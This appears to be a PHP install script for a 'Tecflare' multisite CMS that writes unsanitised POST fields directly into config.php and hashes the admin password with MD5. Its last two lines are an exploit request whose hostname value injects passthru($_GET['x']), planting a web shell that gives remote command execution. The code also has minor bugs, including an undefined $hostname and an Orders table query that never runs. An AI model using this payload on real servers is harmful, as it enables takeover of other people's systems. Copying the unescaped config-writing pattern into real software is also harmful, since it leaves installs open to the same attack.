<?php/* * Tecflare Corporation * Copyright Tecflare Corporation * Provided b

1. <?php
2. /*
3. * Tecflare Corporation
4. * Copyright Tecflare Corporation
5. * Provided by the Tecflare Corporation System
6. * * Code has been scanned by styleci.io
7. */
8. $host = $_POST['hostname'];
9. $username = $_POST['username'];
10. $password = $_POST['password'];
11. $database = $_POST['database'];
12. //Verify Connection
13. $link = mysqli_connect($host, $username, $password, $database);
14. /* check connection */
15. if (mysqli_connect_errno()) {
16. header('Location: index.php?error');
17. die();
18. }
19. /* check if server is alive */
20. if (!mysqli_ping($link)) {
21. header('Location: index.php?error');
22. die();
23. }
24. $conn = new mysqli($hostname, $username, $password, $database);
25. $sql = 'CREATE TABLE Administrators (
26. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
27. username VARCHAR(1000),
28. password VARCHAR(1000)
29. )';
30. $conn->query($sql);
31. $sql = 'CREATE TABLE Settings (
32. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
33. code VARCHAR(1000),
34. value VARCHAR(1000)
35. )';
36. $conn->query($sql);
37. $sql = 'CREATE TABLE Storage (
38. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
39. name VARCHAR(99999),
40. value TEXT
41. )';
42. $conn->query($sql);
43. $sql = 'CREATE TABLE Blockedips (
44. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
45. blocked VARCHAR(99999),
46. value TEXT
47. )';
48. $conn->query($sql);
49. $sql = 'CREATE TABLE Posts (
50. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
51. name VARCHAR(99999),
52. author VARCHAR(99999),
53. value TEXT
54. )';
55. $conn->query($sql);
56. $sql = 'CREATE TABLE Pages (
57. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
58. name VARCHAR(99999),
59. value TEXT
60. )';
61. $conn->query($sql);
62. $sql = 'CREATE TABLE Items (
63. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
64. name VARCHAR(99999),
65. cost VARCHAR(99999),
66. description TEXT
67. )';
68. $conn->query($sql);
69. $sql = 'CREATE TABLE Orders (
70. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
71. email VARCHAR(99999),
72. Products TEXT
73. )';
74. $sql = 'CREATE TABLE Comments (
75. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
76. name VARCHAR(99999),
77. about TEXT
78. )';
79. $conn->query($sql);
80. $sql = 'CREATE TABLE dragdrop (
81. id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
82. value TEXT
83. )';
84. $conn->query($sql);
85. $sql = "CREATE TABLE Plugins (
86. filename varchar(127) collate utf8_bin default NULL,
87. action tinyint(1) default '0',
88. PRIMARY KEY (`filename`)
89. )";
90. $conn->query($sql);
91. $sql = "INSERT INTO Administrators (id, username, password) VALUES ('1', '".$conn->real_escape_string(addslashes($_POST['username_p']))."', '".md5($conn->real_escape_string($_POST['password_p']))."')";
92. $conn->query($sql);
93. $sql = "INSERT INTO Settings (id, code, value) VALUES ('1', 'title','Multisite Central')";
94. $conn->query($sql);
95. $sql = "INSERT INTO Settings (id, code, value) VALUES ('2', 'maintainanceMode','0')";
96. $conn->query($sql);
97. $sql = "INSERT INTO Settings (id, code, value) VALUES ('3', 'welcomemsg','Welcome to Multisite')";
98. $conn->query($sql);
99. $conn->query($sql);
100. $sql = "INSERT INTO Settings (id, code, value) VALUES ('4', 'mail','noemail@gmail.com')";
101. $conn->query($sql);
102. $sql = "INSERT INTO Settings (id, code, value) VALUES ('5', 'api','')";
103. $conn->query($sql);
104. $conn->close();
105. $data = '<?php
106. $hostname="'.$host.'";
107. $username="'.$username.'";
108. $password="'.$password.'";
109. $db_name="'.$database.'";
110. ?>';
111. $file = '../config.php';
112. $handle = fopen($file, 'a');
113. if (fwrite($handle, $data) === false) {
114. echo 'Can not write to ('.$file.')';
115. }
116. fclose($handle);
117. header('Location: index.php?install');
118. /* close connection */
119. mysqli_close($link);
120.  
121. POST install.php
122. hostname=localhost%00";passthru($_GET['x']);$foo="&username=dbuser&password=dbpassword&database=db